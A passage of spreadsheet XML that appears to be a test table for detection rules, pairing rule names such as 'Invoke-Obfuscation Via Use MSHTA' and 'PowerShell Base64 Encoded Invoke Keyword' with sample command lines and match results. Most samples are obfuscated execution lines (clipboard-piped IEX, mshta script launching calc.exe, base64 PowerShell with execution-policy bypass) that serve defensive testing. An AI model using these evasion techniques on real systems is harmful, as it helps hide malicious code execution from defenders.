      <c r="H1142" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1142" s="44" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1142" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1142" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1143" ht="15.75" customHeight="1" s="42">
      <c r="A1143" s="43" t="n"/>
      <c r="B1143" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1143" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1143" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1143" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c echo Write-Host "'Bypass Test'" | clip &amp; powershell -c IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1143" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1143" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1143" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1143" s="44" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1143" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1143" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1144" ht="15.75" customHeight="1" s="42">
      <c r="A1144" s="43" t="n"/>
      <c r="B1144" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1144" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1144" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1144" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" echo Write-Host "'Bypass Test'" | clip &amp; powershell /"c" IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1144" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1144" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1144" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1144" s="44" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1144" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1144" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1145" ht="15.75" customHeight="1" s="42">
      <c r="A1145" s="43" t="n"/>
      <c r="B1145" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1145" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1145" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1145" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" echo Write-Host "'Bypass Test'" | clip &amp; powershell -C IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1145" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1145" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1145" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1145" s="44" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1145" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1145" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1146" ht="15.75" customHeight="1" s="42">
      <c r="A1146" s="43" t="n"/>
      <c r="B1146" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1146" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1146" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1146" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C echo Write-Host "'Bypass Test'" | clip &amp; powershell /"c" IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1146" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1146" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1146" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1146" s="44" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1146" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1146" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1147" ht="15.75" customHeight="1" s="42">
      <c r="A1147" s="43" t="n"/>
      <c r="B1147" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1147" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1147" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1147" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" echo Write-Host "'Bypass Test'" | clip &amp; powershell -"c" IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1147" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1147" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1147" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1147" s="43" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1147" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1147" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1148" ht="15.75" customHeight="1" s="42">
      <c r="A1148" s="43" t="n"/>
      <c r="B1148" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1148" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1148" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1148" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C echo Write-Host "'Bypass Test'" | clip &amp; powershell -c IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1148" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1148" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1148" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1148" s="44" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1148" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1148" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1149" ht="15.75" customHeight="1" s="42">
      <c r="A1149" s="43" t="n"/>
      <c r="B1149" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1149" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1149" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1149" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c echo Write-Host "'Bypass Test'" | clip &amp; powershell -C IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1149" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1149" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1149" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1149" s="44" t="inlineStr">
        <is>
          <t>Data Copied To Clipboard Via Clip.EXE (ddeff553-5233-4ae9-bbab-d64d2bd634be)</t>
        </is>
      </c>
      <c r="J1149" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1149" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1150" ht="15.75" customHeight="1" s="42">
      <c r="A1150" s="43" t="n"/>
      <c r="B1150" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C1150" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D1150" s="44" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E1150" s="44" t="inlineStr">
        <is>
          <t>set a=calc.exe &amp; mshta vbscript:CreateObject("WScript.Shell").Exec("%a%")(window.close)</t>
        </is>
      </c>
      <c r="F1150" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1150" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1150" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1150" s="43" t="inlineStr">
        <is>
          <t>MSHTA Execution with Suspicious File Extensions (cc7abbd0-762b-41e3-8a26-57ad50d2eea3)</t>
        </is>
      </c>
      <c r="J1150" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1150" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1151" ht="15.75" customHeight="1" s="42">
      <c r="A1151" s="43" t="n"/>
      <c r="B1151" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C1151" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D1151" s="44" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E1151" s="44" t="inlineStr">
        <is>
          <t>set a=calc.exe &amp;&amp; mshta javascript:a=new ActiveXObject("WScript.Shell");a.Run("%a%");window.close();</t>
        </is>
      </c>
      <c r="F1151" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1151" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1151" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1151" s="4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J1151" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1151" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1152" ht="15.75" customHeight="1" s="42">
      <c r="A1152" s="43" t="n"/>
      <c r="B1152" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta</t>
        </is>
      </c>
      <c r="C1152" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use MSHTA</t>
        </is>
      </c>
      <c r="D1152" s="44" t="inlineStr">
        <is>
          <t>ac20ae82-8758-4f38-958e-b44a3140ca88</t>
        </is>
      </c>
      <c r="E1152" s="44" t="inlineStr">
        <is>
          <t>set a=1 &amp;&amp; m^shta vbscript:createobject("WScript.Shell").run("calc.exe")(window.close)</t>
        </is>
      </c>
      <c r="F1152" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1152" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1152" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1152" s="44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1152" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1152" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1153" ht="15.75" customHeight="1" s="42">
      <c r="A1153" s="43" t="n"/>
      <c r="B1153" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1153" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1153" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1153" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1153" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1153" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1153" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1153" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1153" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1153" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1154" ht="15.75" customHeight="1" s="42">
      <c r="A1154" s="43" t="n"/>
      <c r="B1154" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1154" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1154" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1154" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmAnD "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1154" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1154" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1154" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1154" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1154" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1154" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1155" ht="15.75" customHeight="1" s="42">
      <c r="A1155" s="43" t="n"/>
      <c r="B1155" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1155" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1155" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1155" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmaNd "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1155" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1155" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1155" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1155" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1155" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1155" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1156" ht="15.75" customHeight="1" s="42">
      <c r="A1156" s="43" t="n"/>
      <c r="B1156" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1156" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1156" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1156" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1156" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1156" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1156" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1156" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1156" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1156" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1157" ht="15.75" customHeight="1" s="42">
      <c r="A1157" s="43" t="n"/>
      <c r="B1157" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1157" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1157" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1157" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMaND "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1157" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1157" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1157" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1157" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1157" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1157" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1158" ht="15.75" customHeight="1" s="42">
      <c r="A1158" s="43" t="n"/>
      <c r="B1158" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1158" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1158" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1158" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnD "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1158" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1158" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1158" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1158" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1158" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1158" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1159" ht="15.75" customHeight="1" s="42">
      <c r="A1159" s="43" t="n"/>
      <c r="B1159" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1159" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1159" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1159" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnD "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1159" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1159" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1159" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1159" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1159" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1159" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1160" ht="15.75" customHeight="1" s="42">
      <c r="A1160" s="43" t="n"/>
      <c r="B1160" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1160" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1160" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1160" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaND "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F1160" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1160" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1160" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1160" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1160" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1160" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1161" ht="15.75" customHeight="1" s="42">
      <c r="A1161" s="43" t="n"/>
      <c r="B1161" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1161" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1161" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1161" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -e aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F1161" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1161" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1161" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1161" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1161" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1161" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1162" ht="15.75" customHeight="1" s="42">
      <c r="A1162" s="43" t="n"/>
      <c r="B1162" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1162" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1162" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1162" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -E aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F1162" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1162" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1162" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1162" s="4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162" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1162" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1163" ht="15.75" customHeight="1" s="42">
      <c r="A1163" s="43" t="n"/>
      <c r="B1163" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1163" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1163" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1163" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -e aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F1163" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1163" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1163" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1163" s="44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163" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1163" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1164" ht="15.75" customHeight="1" s="42">
      <c r="A1164" s="43" t="n"/>
      <c r="B1164" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1164" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1164" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1164" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXEcuTiOnPOLIcY Bypass -e aQBOAHYATwBrAEUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F1164" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1164" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1164" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1164" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1164" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1164" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1165" ht="15.75" customHeight="1" s="42">
      <c r="A1165" s="43" t="n"/>
      <c r="B1165" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1165" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1165" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1165" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAIgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAMQAiAA==</t>
        </is>
      </c>
      <c r="F1165" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1165" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1165" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1165" s="43" t="n"/>
      <c r="J1165" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1165" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1166" ht="15.75" customHeight="1" s="42">
      <c r="A1166" s="43" t="n"/>
      <c r="B1166" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C1166" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D1166" s="44" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E1166" s="44" t="inlineStr">
        <is>
